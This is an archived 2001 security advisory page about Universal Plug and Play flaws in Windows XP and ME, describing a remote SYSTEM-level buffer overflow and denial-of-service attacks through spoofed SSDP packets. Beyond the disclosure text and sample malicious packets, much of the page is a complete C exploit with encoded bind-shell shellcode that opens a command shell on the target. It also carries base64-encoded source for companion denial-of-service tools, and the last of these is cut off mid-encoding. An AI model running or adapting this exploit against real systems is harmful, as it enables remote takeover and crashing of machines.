Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Windows :: win4949.htm

UPNP remote vulnerabilities



21th Dec 2001 [SBWID-4949]
COMMAND

	UPNP remote vulnerabilities

SYSTEMS AFFECTED

	 Microsoft Windows XP (All default systems)

	 Microsoft Windows 98 (Certain configurations)

	 Microsoft Windows 98SE (Certain configurations)

	 Microsoft Windows ME (Certain configurations)

	

	

PROBLEM

	Eeye team  (http://www.eeye.com)  found  three  vulnerabilities  in  UPN
	(Universal Plug and Play) Service  which  can  be  used  to  detect  and
	integrate with UPNP  aware  devices  :  A  remotely  exploitable  buffer
	overflow to gain SYSTEM level access  to  any  default  installation  of
	Windows XP, a Denial of Service (DoS) attack, and a  Distributed  Denial
	of Service (DDoS) attack.
	

	

	 Description:

	 ============

	

	Windows XP ships by default  with  a  UPNP  (Universal  Plug  and  Play)
	Service which can be used  to  detect  and  integrate  with  UPNP  aware
	devices. Windows ME does not ship by  default  with  the  UPNP  service,
	however some OEM versions do provide the UPNP service by  default.  Also
	its possible to install the Windows XP Internet  Connection  Sharing  on
	top of Windows 98, therefore making it vulnerable.
	

	\"UPNP architecture offers pervasive peer-to-peer  network  connectivity
	of PCs  of  all  form  factors,  intelligent  appliances,  and  wireless
	devices. UPNP architecture  leverages  TCP/IP  and  the  Web  to  enable
	seamless proximity networking in addition to control and  data  transfer
	among  networked  devices  in  the  home,  office,  and  everywhere   in
	between.\" as described on upnp.org.
	

	We believe that there are several issues with the UPNP protocol  itself.
	However these  more  generic  issues  are  out  of  the  scope  of  this
	advisory. Expect a detailed paper to be released from  eEye  within  the
	coming weeks.
	

	This advisory covers  three  vulnerabilities  within  Microsoft\'s  UPNP
	implementation. A remotely exploitable buffer overflow  to  gain  SYSTEM
	level access to any default installation of  Windows  XP,  a  Denial  of
	Service (DoS)  attack,  and  a  Distributed  Denial  of  Service  (DDoS)
	attack.
	

	

	 The SYSTEM Remote exploit

	 ==========================

	

	The first vulnerability, within Microsoft\'s implementation of the  UPNP
	protocol, can result in an attacker gaining remote SYSTEM  level  access
	to any default installation of Windows XP. SYSTEM is the  highest  level
	of access within Windows XP.
	

	During testing of the  UPNP  service,  we  discovered  that  by  sending
	malformed  advertisements  at  various  speeds  we  could  cause  access
	violations on the target machine. Most of these  were  due  to  pointers
	being overwritten. The following describes one instance.
	

	Example Session:
	

	

	NOTIFY * HTTP/1.1

	HOST: 239.255.255.250:1900

	CACHE-CONTROL: max-age=10

	LOCATION: http://IPADDRESS:PORT/<buffer>.xml

	NT: urn:schemas-upnp-org:device:InternetGatewayDevice:1

	NTS: ssdp:alive

	SERVER: EEYE/2001 UPnP/1.0 product/1.1

	USN: uuid:EEYE

	

	

	If a buffer is incremented in the protocol, port, and uri fields of  the
	Location URL  and  send  sessions  with  10,000  microsecond  intervals,
	access violations will begin to be observed. In one situation,  The  EAX
	and ECX registers will contain addresses that  are  pulled  from  memory
	that was overwritten and the svchost.exe process will access an  invalid
	memory address at a \"mov\" instruction. It throws and access  violation
	due to the fact that the destination address is an overwritten  pointer,
	and there\'s nothing interesting at 0x41414141.
	

	During  our  testing  we  found  that  there  were  multiple  points  of
	exploitation. In our testing we found instances of stack  overflows  and
	heap overflows, both of which were exploitable. In the case of the  heap
	overflow  we  saw  pointers  being  overwritten  for  both  buffers  and
	functions.
	

	The SSDP service also listens  on  Multicast  and  Broadcast  addresses.
	Therefore gaining SYSTEM access to an entire network of XP  machines  is
	possible with only one anonymous UDP SSDP attack session.
	

	

	 The DoS and DDoS

	 ================

	

	UPNP consists of multiple protocols,  one  of  which  being  the  Simple
	Service Discovery  Protocol  (SSDP).  When  a  UPNP  enabled  device  is
	installed on a network, whether it be a  computer,  network  device,  or
	even a household appliance, it sends  out  an  advertisement  to  notify
	control points of its  existence.  On  a  default  XP  installation,  no
	support is added for device control as  it  would  be  the  case  in  an
	installation of UPNP from \"Network Services\".
	

	Although     Microsoft     added     default     support     for      an
	\"InternetGatewayDevice.\" if a sniffer is run on a network with XP,  XP
	can be observed searching  for  this  device  as  XP  is  loading.  This
	support was added  to  aid  leading  network  hardware  manufactures  in
	making UPnP enabled \"gateway devices\".
	

	By  sending  a  malicious  spoofed  UDP  packet   containing   an   SSDP
	advertisement, an attacker can force the XP/ME client  to  connect  back
	to a specified IP address and pass on a specified HTTP/HTTPS request.
	

	An example session:
	

	

	NOTIFY * HTTP/1.1

	HOST: 239.255.255.250:1900

	CACHE-CONTROL: max-age=1

	LOCATION: URL

	NT: urn: schemas-upnp-org:device:InternetGatewayDevice:1

	NTS: ssdp:alive

	SERVER: EEYE/2001 UPnP/1.0 PASSITON/1.1

	USN: uuid:EEYE

	

	

	The above packet data needs to be sent as a UDP packet to port  1900  of
	the XP/ME machine.
	

	When the XP machine receives this request, it  will  interpret  the  URL
	following the LOCATION header entity. With no sanitizing of the  URL  it
	is passed on to the functions in the Windows Internet Services API.  The
	string is broken down and the new  session is created.
	

	 For example:

	

	 LOCATION: http://xptest.example.com:19/himom.html

	

	

	A malicious attacker  could  specify  a  chargen  service  on  a  remote
	machine causing the XP client to connect  and  get  caught  in  a  tight
	read/malloc loop. Doing this will throw the  machine  into  an  unstable
	state where CPU utilization is at %100 and memory is being allocated  to
	the point that it is totally consumed. This basically makes  the  remote
	XP  system  completely  unusable  and  requires  a  physical  power  off
	shutdown.
	

	Attackers could also use this exploit to control  other  XP  machine\'s,
	forcing such machines to perform  Unicode  attacks,  double  decode,  or
	random CGI exploiting. Due to the insecure nature  of  UDP  an  attacker
	can exploit security holes on a web server using UPNP with almost  total
	anonymity.
	

	One of the bigger problems, and why this can become a  DDoS  attack,  is
	that this SSDP announcement can  be  sent  to  broadcast  addresses  and
	multicast. It is therefore possible to send one UDP packet  causing  all
	XP machines on the target network to be navigated to the URL of  choice,
	performing an attack of choice.
	

	Also since parts of the UPNP service are  implemented  as  UDP  (in  our
	opinion,  a  bad  idea),  it  makes  all  of  these  attacks  completely
	untraceable.
	

	 Update

	 ======

	

	Exploit :
	 

	/*

	* WinME/XP UPNP dos & overflow

	*

	* Run: ./XPloit host <option>

	*

	* Windows run the \"Universal Plug and Play technology\" service

	* at port 5000. In the future this will  allow    for seemless

	* connectivity of various devices such as a printer.

	* This service have a DoS and a buffer overflow I exploit here.

	*

	* PD: the -e option spawns a cmd.exe shell on port 7788 coded by isno

	*

	* Author:      hamada alborno

	* Email:       webmasta100@hotmail.com

	* Webpage:     http://www.a2z-net.net

	*/

	

	#include <stdio.h>

	#include <string.h>

	#include <stdlib.h>

	#include <errno.h>

	#include <string.h>

	#include <netdb.h>

	#include <sys/types.h>

	#include <netinet/in.h>

	#include <sys/socket.h>

	#include <sys/wait.h>

	#include <unistd.h>

	#include <fcntl.h>

	

	#define MAX	10000

	#define PORT	5000

	#define FREEZE	512

	#define NOP	0x43	//inc ebx, instead of 0x90

	

	/***************************************************************************/

	

	int main(int argc,char *argv[])

	{

	int sockfd[MAX];

	char sendXP[]=\"XP\";

	char jmpcode[281], execode[840],request[2048];

	char *send_buffer;

	int num_socks;

	int bindport;

	int i;

	int port;

	

	unsigned char shellcode[] =

	        \"\\x90\\xeb\\x03\\x5d\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x83\\xc5\\x15\\x90\\x90\"

	        \"\\x90\\x8b\\xc5\\x33\\xc9\\x66\\xb9\\x10\\x03\\x50\\x80\\x30\\x97\\x40\\xe2\\xfa\"

	        \"\\x7e\\x8e\\x95\\x97\\x97\\xcd\\x1c\\x4d\\x14\\x7c\\x90\\xfd\\x68\\xc4\\xf3\\x36\"

	        \"\\x97\\x97\\x97\\x97\\xc7\\xf3\\x1e\\xb2\\x97\\x97\\x97\\x97\\xa4\\x4c\\x2c\\x97\"

	        \"\\x97\\x77\\xe0\\x7f\\x4b\\x96\\x97\\x97\\x16\\x6c\\x97\\x97\\x68\\x28\\x98\\x14\"

	        \"\\x59\\x96\\x97\\x97\\x16\\x54\\x97\\x97\\x96\\x97\\xf1\\x16\\xac\\xda\\xcd\\xe2\"

	        \"\\x70\\xa4\\x57\\x1c\\xd4\\xab\\x94\\x54\\xf1\\x16\\xaf\\xc7\\xd2\\xe2\\x4e\\x14\"

	        \"\\x57\\xef\\x1c\\xa7\\x94\\x64\\x1c\\xd9\\x9b\\x94\\x5c\\x16\\xae\\xdc\\xd2\\xc5\"

	        \"\\xd9\\xe2\\x52\\x16\\xee\\x93\\xd2\\xdb\\xa4\\xa5\\xe2\\x2b\\xa4\\x68\\x1c\\xd1\"

	        \"\\xb7\\x94\\x54\\x1c\\x5c\\x94\\x9f\\x16\\xae\\xd0\\xf2\\xe3\\xc7\\xe2\\x9e\\x16\"

	        \"\\xee\\x93\\xe5\\xf8\\xf4\\xd6\\xe3\\x91\\xd0\\x14\\x57\\x93\\x7c\\x72\\x94\\x68\"

	        \"\\x94\\x6c\\x1c\\xc1\\xb3\\x94\\x6d\\xa4\\x45\\xf1\\x1c\\x80\\x1c\\x6d\\x1c\\xd1\"

	        \"\\x87\\xdf\\x94\\x6f\\xa4\\x5e\\x1c\\x58\\x94\\x5e\\x94\\x5e\\x94\\xd9\\x8b\\x94\"

	        \"\\x5c\\x1c\\xae\\x94\\x6c\\x7e\\xfe\\x96\\x97\\x97\\xc9\\x10\\x60\\x1c\\x40\\xa4\"

	        \"\\x57\\x60\\x47\\x1c\\x5f\\x65\\x38\\x1e\\xa5\\x1a\\xd5\\x9f\\xc5\\xc7\\xc4\\x68\"

	        \"\\x85\\xcd\\x1e\\xd5\\x93\\x1a\\xe5\\x82\\xc5\\xc1\\x68\\xc5\\x93\\xcd\\xa4\\x57\"

	        \"\\x3b\\x13\\x57\\xe2\\x6e\\xa4\\x5e\\x1d\\x99\\x13\\x5e\\xe3\\x9e\\xc5\\xc1\\xc4\"

	        \"\\x68\\x85\\xcd\\x3c\\x75\\x7f\\xd1\\xc5\\xc1\\x68\\xc5\\x93\\xcd\\x1c\\x4f\\xa4\"

		\"\\x57\\x3b\\x13\\x57\\xe2\\x6e\\xa4\\x5e\\x1d\\x99\\x17\\x6e\\x95\\xe3\\x9e\\xc5\"

	        \"\\xc1\\xc4\\x68\\x85\\xcd\\x3c\\x75\\x70\\xa4\\x57\\xc7\\xd7\\xc7\\xd7\\xc7\\x68\"

	        \"\\xc0\\x7f\\x04\\xfd\\x87\\xc1\\xc4\\x68\\xc0\\x7b\\xfd\\x95\\xc4\\x68\\xc0\\x67\"

	        \"\\xa4\\x57\\xc0\\xc7\\x27\\x9b\\x3c\\xcf\\x3c\\xd7\\x3c\\xc8\\xdf\\xc7\\xc0\\xc1\"

	        \"\\x3a\\xc1\\x68\\xc0\\x57\\xdf\\xc7\\xc0\\x3a\\xc1\\x3a\\xc1\\x68\\xc0\\x57\\xdf\"

	        \"\\x27\\xd3\\x1e\\x90\\xc0\\x68\\xc0\\x53\\xa4\\x57\\x1c\\xd1\\x63\\x1e\\xd0\\xab\"

	        \"\\x1e\\xd0\\xd7\\x1c\\x91\\x1e\\xd0\\xaf\\xa4\\x57\\xf1\\x2f\\x96\\x96\\x1e\\xd0\"

	        \"\\xbb\\xc0\\xc0\\xa4\\x57\\xc7\\xc7\\xc7\\xd7\\xc7\\xdf\\xc7\\xc7\\x3a\\xc1\\xa4\"

	        \"\\x57\\xc7\\x68\\xc0\\x5f\\x68\\xe1\\x67\\x68\\xc0\\x5b\\x68\\xe1\\x6b\\x68\\xc0\"

	        \"\\x5b\\xdf\\xc7\\xc7\\xc4\\x68\\xc0\\x63\\x1c\\x4f\\xa4\\x57\\x23\\x93\\xc7\\x56\"

	        \"\\x7f\\x93\\xc7\\x68\\xc0\\x43\\x1c\\x67\\xa4\\x57\\x1c\\x5f\\x22\\x93\\xc7\\xc7\"

	        \"\\xc0\\xc6\\xc1\\x68\\xe0\\x3f\\x68\\xc0\\x47\\x14\\xa8\\x96\\xeb\\xb5\\xa4\\x57\"

	        \"\\xc7\\xc0\\x68\\xa0\\xc1\\x68\\xe0\\x3f\\x68\\xc0\\x4b\\x9c\\x57\\xe3\\xb8\\xa4\"

	        \"\\x57\\xc7\\x68\\xa0\\xc1\\xc4\\x68\\xc0\\x6f\\xfd\\xc7\\x68\\xc0\\x77\\x7c\\x5f\"

	        \"\\xa4\\x57\\xc7\\x23\\x93\\xc7\\xc1\\xc4\\x68\\xc0\\x6b\\xc0\\xa4\\x5e\\xc6\\xc7\"

	        \"\\xc1\\x68\\xe0\\x3b\\x68\\xc0\\x4f\\xfd\\xc7\\x68\\xc0\\x77\\x7c\\x3d\\xc7\\x68\"

	        \"\\xc0\\x73\\x7c\\x69\\xcf\\xc7\\x1e\\xd5\\x65\\x54\\x1c\\xd3\\xb3\\x9b\\x92\\x2f\"

	        \"\\x97\\x97\\x97\\x50\\x97\\xef\\xc1\\xa3\\x85\\xa4\\x57\\x54\\x7c\\x7b\\x7f\\x75\"

	        \"\\x6a\\x68\\x68\\x7f\\x05\\x69\\x68\\x68\\xdc\\xc1\\x70\\xe0\\xb4\\x17\\x70\\xe0\"

	        \"\\xdb\\xf8\\xf6\\xf3\\xdb\\xfe\\xf5\\xe5\\xf6\\xe5\\xee\\xd6\\x97\\xdc\\xd2\\xc5\"

	        \"\\xd9\\xd2\\xdb\\xa4\\xa5\\x97\\xd4\\xe5\\xf2\\xf6\\xe3\\xf2\\xc7\\xfe\\xe7\\xf2\"

	        \"\\x97\\xd0\\xf2\\xe3\\xc4\\xe3\\xf6\\xe5\\xe3\\xe2\\xe7\\xde\\xf9\\xf1\\xf8\\xd6\"

		\"\\x97\\xd4\\xe5\\xf2\\xf6\\xe3\\xf2\\xc7\\xe5\\xf8\\xf4\\xf2\\xe4\\xe4\\xd6\\x97\"

	        \"\\xd4\\xfb\\xf8\\xe4\\xf2\\xdf\\xf6\\xf9\\xf3\\xfb\\xf2\\x97\\xc7\\xf2\\xf2\\xfc\"

	        \"\\xd9\\xf6\\xfa\\xf2\\xf3\\xc7\\xfe\\xe7\\xf2\\x97\\xd0\\xfb\\xf8\\xf5\\xf6\\xfb\"

	        \"\\xd6\\xfb\\xfb\\xf8\\xf4\\x97\\xc0\\xe5\\xfe\\xe3\\xf2\\xd1\\xfe\\xfb\\xf2\\x97\"

	        \"\\xc5\\xf2\\xf6\\xf3\\xd1\\xfe\\xfb\\xf2\\x97\\xc4\\xfb\\xf2\\xf2\\xe7\\x97\\xd2\"

	        \"\\xef\\xfe\\xe3\\xc7\\xe5\\xf8\\xf4\\xf2\\xe4\\xe4\\x97\\x97\\xc0\\xc4\\xd8\\xd4\"

	        \"\\xdc\\xa4\\xa5\\x97\\xe4\\xf8\\xf4\\xfc\\xf2\\xe3\\x97\\xf5\\xfe\\xf9\\xf3\\x97\"

	        \"\\xfb\\xfe\\xe4\\xe3\\xf2\\xf9\\x97\\xf6\\xf4\\xf4\\xf2\\xe7\\xe3\\x97\\xe4\\xf2\"

	        \"\\xf9\\xf3\\x97\\xe5\\xf2\\xf4\\xe1\\x97\\x95\\x97\\x89\\xfb\\x97\\x97\\x97\\x97\"

	        \"\\x97\\x97\\x97\\x97\\x97\\x97\\x97\\x97\\xf4\\xfa\\xf3\\xb9\\xf2\\xef\\xf2\\x97\"

	        \"\\x68\\x68\\x68\\x68\";

	struct hostent *he;

	struct sockaddr_in their_addr;

	

	

		if(argc!=3)

		{

			fprintf(stderr,\"usage:%s <hostname> <command>\\n\",argv[0]);

			fprintf(stderr,\"-f  freeze the machine.\\n\");

			fprintf(stderr,\"-e  exploit.\\n\");

			exit(1);

		}

	

	

		if(strstr(argv[2],\"-f\")) {

			num_socks=FREEZE;

			send_buffer=sendXP;

		}

	

		if(strstr(argv[2],\"-e\")) {

			num_socks=1;

			send_buffer=request;

			bindport^=0x9797;

			shellcode[778]= (bindport) & 0xff;

			shellcode[779]= (bindport >> 8) & 0xff;

	

			for(i = 0; i < 268; i++)

			        jmpcode[i] = (char)NOP;

	

			jmpcode[268] = (char)0x4d;

			jmpcode[269] = (char)0x3f;

			jmpcode[270] = (char)0xe3;

			jmpcode[271] = (char)0x77;

			jmpcode[272] = (char)0x90;

			jmpcode[273] = (char)0x90;

			jmpcode[274] = (char)0x90;

			jmpcode[275] = (char)0x90;

	

			//jmp [ebx+0x64], jump to execute shellcode

			jmpcode[276] = (char)0xff;

			jmpcode[277] = (char)0x63;

			jmpcode[278] = (char)0x64;

			jmpcode[279] = (char)0x90;

			jmpcode[280] = (char)0x00;

	

			for(i = 0; i < 32; i++)

	        		execode[i] = (char)NOP;

			execode[32]=(char)0x00;

			strcat(execode, shellcode);

	

	        	snprintf(request, 2048, \"%s%s\\r\\n\\r\\n\", jmpcode, execode);

		}

	

		if((he=gethostbyname(argv[1]))==NULL)

		{

			perror(\"gethostbyname\");

			exit(1);

		}

	

	

	/***************************************************************************/

	

		for(i=0; i<num_socks;i++)

			if( (sockfd[i]=socket(AF_INET,SOCK_STREAM,0)) == -1) {

				perror(\"socket\"); exit(1);

			}

	

	

		their_addr.sin_family=AF_INET;

		their_addr.sin_port=htons(PORT);

		their_addr.sin_addr=*((struct in_addr*)he->h_addr);

		bzero(&(their_addr.sin_zero),8);

	

	

	

		for(i=0; i<num_socks;i++)

			if( connect(sockfd[i],(struct sockaddr*)&their_addr, sizeof(struct 

	sockaddr))==-1)

		{

			perror(\"connect\");

			exit(1);

		}

	

	

		for(i=0; i<num_socks;i++)

		if(send(sockfd[i],send_buffer,strlen(send_buffer),0) ==-1)

		{

			perror(\"send\");

			exit(0);

		}

	

	

		for(i=0; i<num_socks;i++)

		close(sockfd[i]);

	

	

	return 0;

	}

	

	

	DoS exploit by Gabriel Maggiotti (unchecked)
	

	

	------_=_NextPart_001_01C19915.7D29A2BD

	Content-Type: application/octet-stream;

		name=\"chargen.c\"

	Content-Transfer-Encoding: base64

	Content-Description: chargen.c

	Content-Disposition: attachment;

		filename=\"chargen.c\"

	

	PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMCBUcmFuc2l0aW9uYWwv

	L0VOIj4NCjwhLS0gc2F2ZWQgZnJvbSB1cmw9KDAwMzQpaHR0cDovL3FiMHgubmV0L2V4cGxvaXRz

	L2NoYXJnZW4uYyAtLT4NCjxIVE1MPjxIRUFEPg0KPE1FVEEgY29udGVudD0idGV4dC9odG1sOyBj

	aGFyc2V0PXdpbmRvd3MtMTI1MiIgaHR0cC1lcXVpdj1Db250ZW50LVR5cGU+DQo8TUVUQSBjb250

	ZW50PSJNU0hUTUwgNS4wMC4yOTE5LjYzMDciIG5hbWU9R0VORVJBVE9SPjwvSEVBRD4NCjxCT0RZ

	PjxYTVA+LyoNCiAqIENoYXJnZW4gU2VydmVyDQogKg0KICogUnVuOiAuL2NoYXJnZW4gPGNoYXJn

	ZW5fcG9ydD4NCiAqDQogKg0KICogQXV0aG9yOiAgICAgIEdhYnJpZWwgTWFnZ2lvdHRpLCBGZXJu

	YW5kbyBPdWJp8WENCiAqIEVtYWlsOiAgICAgICBnbWFnZ2lvdEBjaXVkYWQuY29tLmFyLCBmb3Vi

	aW5hQHFiMHgubmV0DQogKiBXZWJwYWdlOiAgICAgaHR0cDovL3FiMHgubmV0DQogKi8NCg0KI2lu

	Y2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RkbGliLmg+DQojaW5jbHVkZSA8ZXJybm8uaD4N

	CiNpbmNsdWRlIDxzdHJpbmcuaD4NCiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4NCiNpbmNsdWRlIDxu

	ZXRpbmV0L2luLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPHN5cy93YWl0

	Lmg+DQojaW5jbHVkZSA8bWFsbG9jLmg+DQoNCiNkZWZpbmUgQkFDS0xPRwk1DQojZGVmaW5lIE1B

	WAk1MDANCg0KaW50DQptYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQppbnQgdmlzaXQ9

	MTsNCmludCBpOw0KaW50IHBvcnQ7DQppbnQgc29ja2ZkOw0KaW50IG5ld2ZkOw0KaW50IG51bWJ5

	dGVzOw0KY2hhciBidWZbTUFYXTsNCmNoYXIgZGllZGJ1ZlsxMDI0XTsNCg0KCXN0cnVjdCBzb2Nr

	YWRkcl9pbiBteV9hZGRyOw0KCXN0cnVjdCBzb2NrYWRkcl9pbiB0aGVpcl9hZGRyOw0KCWludCBz

	aW5fc2l6ZTsNCg0KCWlmKGFyZ2MhPTIpIHsNCgkJZnByaW50ZihzdGRlcnIsInVzYWdlOiAlcyA8

	Y2hhcmdlbl9wb3J0PlxuIixhcmd2WzBdKTsNCgkJcmV0dXJuIDE7DQoJfQ0KCXBvcnQ9YXRvaShh

	cmd2WzFdKTsNCg0KCWlmKCAoc29ja2ZkPXNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgMCkp

	ID09IC0xKQ0KCXsNCgkJcGVycm9yKCJzb2NrZXQiKTsNCgkJZXhpdCgxKTsNCgl9DQoNCglteV9h

	ZGRyLnNpbl9mYW1pbHk9QUZfSU5FVDsNCglteV9hZGRyLnNpbl9wb3J0PWh0b25zKHBvcnQpOw0K

	CW15X2FkZHIuc2luX2FkZHIuc19hZGRyPWh0b25sKElOQUREUl9BTlkpOw0KCWJ6ZXJvKCAmKG15

	X2FkZHIuc2luX3plcm8pLDgpOw0KDQoJaWYoIGJpbmQoc29ja2ZkLCAoc3RydWN0IHNvY2thZGRy

	ICopICZteV9hZGRyLFwNCgkJc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikgKSA9PSAtMSkNCgl7DQoJ

	CXBlcnJvcigiYmluZCIpOw0KCQlleGl0KDEpOw0KCX0NCg0KDQoJaWYoIGxpc3Rlbihzb2NrZmQs

	IEJBQ0tMT0cpID09IC0xKQ0KCXsNCgkJcGVycm9yKCJsaXN0ZW4iKTsNCgkJZXhpdCgxKTsNCgl9

	DQoNCglmb3IoaT0wO2k8MTAyNDtpKyspDQoJCWRpZWRidWZbaV0gPSAncSc7DQoNCgl3aGlsZSgx

	KSANCgl7CQ0KCQlzaW5fc2l6ZT1zaXplb2YoIHN0cnVjdCBzb2NrYWRkcl9pbik7DQoJCWlmKCAo

	bmV3ZmQ9YWNjZXB0KHNvY2tmZCwoc3RydWN0IHNvY2thZGRyKikmdGhlaXJfYWRkcixcDQoJCQkg

	JnNpbl9zaXplKSk9PSAtMSkNCgkJew0KCQkJcGVycm9yKCJhY2NlcHQiKTsNCgkJCWV4aXQoMSk7

	DQoJCX0NCgkJcHJpbnRmKCJWaXNpdCBudW1iZXI6ICVkXG4iLHZpc2l0KyspOw0KDQoJCWlmKCFm

	b3JrKCkpIA0KCQl7DQoJCQlpbnQgaT0xOw0KCQkJaWYoIChudW1ieXRlcz1yZWN2KG5ld2ZkLGJ1

	ZixNQVgsMCkpPT0tMSApIA0KCQkJew0KCQkJCXBlcnJvcigicmVjdiIpOw0KCQkJCWV4aXQoMSk7

	DQoJCQl9DQoJDQoJCQlidWZbbnVtYnl0ZXNdPSdcMCc7DQoJCQlwcmludGYoIiVzXG4iLGJ1Zik7

	DQoJDQoJCQl3aGlsZSgxKQ0KCQkJew0KCQkJCWlmKHNlbmQobmV3ZmQsZGllZGJ1ZiwxMDI0LDAp

	ID09LTEpDQoJCQkJew0KICAgICAgICAJCQkJcGVycm9yKCJzZW5kIik7DQogICAgICAgIAkJCQll

	eGl0KDApOw0KCQkJCX0NCgkJCX0NCgkJfQ0KCX0NCmNsb3NlKG5ld2ZkKTsNCn0NCjwvWE1QPjwv

	Qk9EWT48L0hUTUw+DQo=

	

	------_=_NextPart_001_01C19915.7D29A2BD

	Content-Type: application/octet-stream;

		name=\"upnp_udp.c\"

	Content-Transfer-Encoding: base64

	Content-Description: upnp_udp.c

	Content-Disposition: attachment;

		filename=\"upnp_udp.c\"

	

	PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMCBUcmFuc2l0aW9uYWwv

	L0VOIj4NCjxIVE1MPjxIRUFEPg0KPE1FVEEgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PXdp

	bmRvd3MtMTI1MiIgaHR0cC1lcXVpdj1Db250ZW50LVR5cGU+PC9IRUFEPg0KPEJPRFk+PFhNUD4v

	KiANCiAqIFdpbk1FL1hQIFVQTlAgRDBTICANCiAqDQogKiAuL3VwbnBfdWRwIDxyZW1vdGVfaG9z

	dG5hbWU+IDxzcG9vZmZlZF9ob3N0PiA8Y2hhcmdlbl9wb3J0Pg0KICoNCiAqIEF1dGhvcnM6ICAg

	ICBHYWJyaWVsIE1hZ2dpb3R0aSwgRmVybmFuZG8gT3ViafFhDQogKiBFbWFpbDogICAgICAgZ21h

	Z2dpb3RAY2l1ZGFkLmNvbS5hciwgZm91YmluYUBxYjB4Lm5ldA0KICogV2VicGFnZTogICAgIGh0

	dHA6Ly9xYjB4Lm5ldA0KICovDQoNCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0cmlu

	Zy5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jbHVkZSA8

	c3RyaW5nLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4NCiNp

	bmNsdWRlIDxuZXRpbmV0L2luLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUg

	PHN5cy93YWl0Lmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8ZmNudGwuaD4NCg0K

	I2RlZmluZSBNQVgJMTAwMA0KI2RlZmluZSBQT1JUCTE5MDANCg0KDQpjaGFyICpzdHJfcmVwbGFj

	ZShjaGFyICpyZXAsIGNoYXIgKm9yaWcsIGNoYXIgKnN0cmluZykNCnsNCmludCBsZW49c3RybGVu

	KG9yaWcpOw0KY2hhciBidWZbTUFYXT0iIjsNCmNoYXIgKnB0PXN0cnN0cihzdHJpbmcsb3JpZyk7

	DQoNCnN0cm5jcHkoYnVmLHN0cmluZywgcHQtc3RyaW5nICk7DQpzdHJjYXQoYnVmLHJlcCk7DQpz

	dHJjYXQoYnVmLHB0K3N0cmxlbihvcmlnKSk7DQpzdHJjcHkoc3RyaW5nLGJ1Zik7DQpyZXR1cm4g

	c3RyaW5nOw0KfQ0KDQovKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq

	KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqLw0KDQppbnQgbWFpbihpbnQgYXJnYyxj

	aGFyICphcmd2W10pDQp7DQoJaW50IHNvY2tmZCxpOw0KCWludCBudW1ieXRlczsNCglpbnQgbnVt

	X3NvY2tzOw0KCWludCBhZGRyX2xlbjsNCgljaGFyIHJlY2l2ZV9idWZmZXJbTUFYXT0iIjsNCg0K

	CWNoYXIgc2VuZF9idWZmZXJbTUFYXT0NCgkiTk9USUZZICogSFRUUC8xLjFcclxuSE9TVDogMjM5

	LjI1NS4yNTUuMjUwOjE5MDBcclxuIg0KCSJDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTFcclxuTE9D

	QVRJT046IGh0dHA6Ly93d3cuaG9zdC5jb206cG9ydC9cclxuIg0KCSJOVDogdXJuOnNjaGVtYXMt

	dXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxXHJcbiINCgkiTlRTOiBzc2Rw

	OmFsaXZlXHJcblNFUlZFUjogUUIwWC8yMDEgVVBuUC8xLjAgcHJvdWN0LzEuMVxyXG4iDQoJIlVT

	TjogdXVpZDpRQjBYXHJcblxyXG5cclxuIjsNCg0KCWNoYXIgKmF1eD1zZW5kX2J1ZmZlcjsNCglz

	dHJ1Y3QgaG9zdGVudCAqaGU7DQoJc3RydWN0IHNvY2thZGRyX2luIHRoZWlyX2FkZHI7DQoNCglp

	ZihhcmdjIT00KQ0KCXsNCgkJZnByaW50ZihzdGRlcnIsInVzYWdlOiVzIDxyZW1vdGVfaG9zdG5h

	bWU+ICJcDQoJCQkiPHNwb29mZmVkX2hvc3Q+IDxjaGFyZ2VuX3BvcnQ+XG4iLGFyZ3ZbMF0pOw0K

	CQlleGl0KDEpOw0KCX0NCg0KDQoJYXV4PXN0cl9yZXBsYWNlKGFyZ3ZbMl0sInd3dy5ob3N0LmNv

	bSIsc2VuZF9idWZmZXIpOw0KCWF1eD1zdHJfcmVwbGFjZShhcmd2WzNdLCJwb3J0IixzZW5kX2J1

	ZmZlcik7DQoNCglpZigoaGU9Z2V0aG9zdGJ5bmFtZShhcmd2WzFdKSk9PU5VTEwpDQoJew0KCQlw

	ZXJyb3IoImdldGhvc3RieW5hbWUiKTsNCgkJZXhpdCgxKTsNCgl9DQoNCg0KCWlmKCAoc29ja2Zk

	PXNvY2tldChBRl9JTkVULFNPQ0tfREdSQU0sMCkpID09IC0xKSB7DQoJCXBlcnJvcigic29ja2V0

	Iik7IGV4aXQoMSk7DQoJfQ0KDQoJdGhlaXJfYWRkci5zaW5fZmFtaWx5PUFGX0lORVQ7DQoJdGhl

	aXJfYWRkci5zaW5fcG9ydD1odG9ucyhQT1JUKTsNCgl0aGVpcl9hZGRyLnNpbl9hZGRyPSooKHN0

	cnVjdCBpbl9hZGRyKiloZS0+aF9hZGRyKTsNCgliemVybygmKHRoZWlyX2FkZHIuc2luX3plcm8p

	LDgpOw0KDQoJaWYoIChudW1ieXRlcz1zZW5kdG8oc29ja2ZkLHNlbmRfYnVmZmVyLHN0cmxlbihz

